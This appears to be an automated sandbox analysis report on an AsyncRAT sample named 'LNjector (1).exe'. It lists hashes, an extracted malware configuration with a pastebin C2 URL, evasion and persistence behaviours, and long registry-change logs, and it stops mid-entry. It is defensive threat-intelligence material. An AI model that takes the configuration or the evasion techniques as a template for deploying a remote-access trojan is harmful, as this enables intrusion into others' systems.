Analysis
-
max time kernel
137s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23/01/2025, 13:39
Static task
static1
Behavioral task
behavioral1
Sample
LNjector (1).exe
Resource
win7-20240903-en
General
-
Target
LNjector (1).exe
-
Size
578KB
-
MD5
0fc72f5b6c6a6109f6f3c3d43089e422
-
SHA1
7b05b6c35e5f1c2dd4aa215b4c0289c970b9cdab
-
SHA256
15c8cc6c27eab9e8c6e8e01883247ffc4a3907042d747859fff2ce622f9647dc
-
SHA512
fcb4251dd52a6bb04009078c5fe38ce014c50091c09c8b54ba3a1d8b910cdf4c915deb7b91838da53033d7da3602057453d651cdb561acc9d634962e31e2c5e3
-
SSDEEP
12288:rlMq2L06Z/oQNgZHjow6V3hLfIW2MxcSg4bQ5RtlcrdxYf:ZILJ9olJowwRLAWFDgqzdif
Malware Config
Extracted
asyncrat
true
LNjector
NglVnt43hRGA
-
delay
3
-
install
false
-
install_file
$77oui.exe
-
install_folder
%StartupStatus%
-
pastebin_config
https://pastebin.com/raw/e0jEz3T0
Signatures
-
Asyncrat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4604 created 616 4604 powershell.EXE 5 -
Async RAT payload 2 IoCs
resource yara_rule behavioral2/files/0x0008000000023cce-60.dat family_asyncrat behavioral2/files/0x0007000000023ccf-68.dat family_asyncrat -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation LNjector (1).exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation acc449ba-d046-4b86-956f-10f8d1ac6d73.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe -
Executes dropped EXE 5 IoCs
pid Process 2180 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe 1664 acc449ba-d046-4b86-956f-10f8d1ac6d73.exe 3684 $77non.exe 4008 $77oui.exe 3568 369e383a-9351-4c3d-ad14-5c551fd60479.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
pid Process 4604 powershell.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 48 IoCs
flow ioc 48 pastebin.com 124 pastebin.com 132 pastebin.com 151 pastebin.com 155 pastebin.com 49 pastebin.com 56 pastebin.com 72 pastebin.com 73 pastebin.com 140 pastebin.com 47 pastebin.com 55 pastebin.com 152 pastebin.com 141 pastebin.com 144 pastebin.com 150 pastebin.com 28 pastebin.com 38 pastebin.com 46 pastebin.com 74 pastebin.com 125 pastebin.com 154 pastebin.com 147 pastebin.com 149 pastebin.com 156 pastebin.com 105 pastebin.com 129 pastebin.com 136 pastebin.com 145 pastebin.com 146 pastebin.com 153 pastebin.com 29 pastebin.com 130 pastebin.com 138 pastebin.com 143 pastebin.com 148 pastebin.com 39 pastebin.com 51 pastebin.com 66 pastebin.com 139 pastebin.com 142 pastebin.com 131 pastebin.com 137 pastebin.com 27 pastebin.com 50 pastebin.com 67 pastebin.com 71 pastebin.com 106 pastebin.com -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\SysWOW64\$77non.exe acc449ba-d046-4b86-956f-10f8d1ac6d73.exe File created C:\Windows\SysWOW64\$77oui.exe 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4604 set thread context of 864 4604 powershell.EXE 125 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 03075cf2-9b61-4396-98c8-fd9cb959cfb9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77oui.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 369e383a-9351-4c3d-ad14-5c551fd60479.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77non.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language acc449ba-d046-4b86-956f-10f8d1ac6d73.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3688 timeout.exe 5108 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS 55 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={46D1E072-05E8-424B-81E4-41BBD7F0FDBC}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 23 Jan 2025 13:41:16 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1737639675" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" LNjector (1).exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 7a003200cb063f00375a2a6d2000434f444543417e312e5a495000005e0009000400efbe375a2a6d375a2b6d2e00000000000000000000000000000000000000000000000000698e3f0063006f006400650063006100760065002d0068006f006f006b002d006d00610069006e002e007a006900700000001c000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 LNjector (1).exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 LNjector (1).exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" LNjector (1).exe Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\NodeSlot = "6" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" LNjector (1).exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local 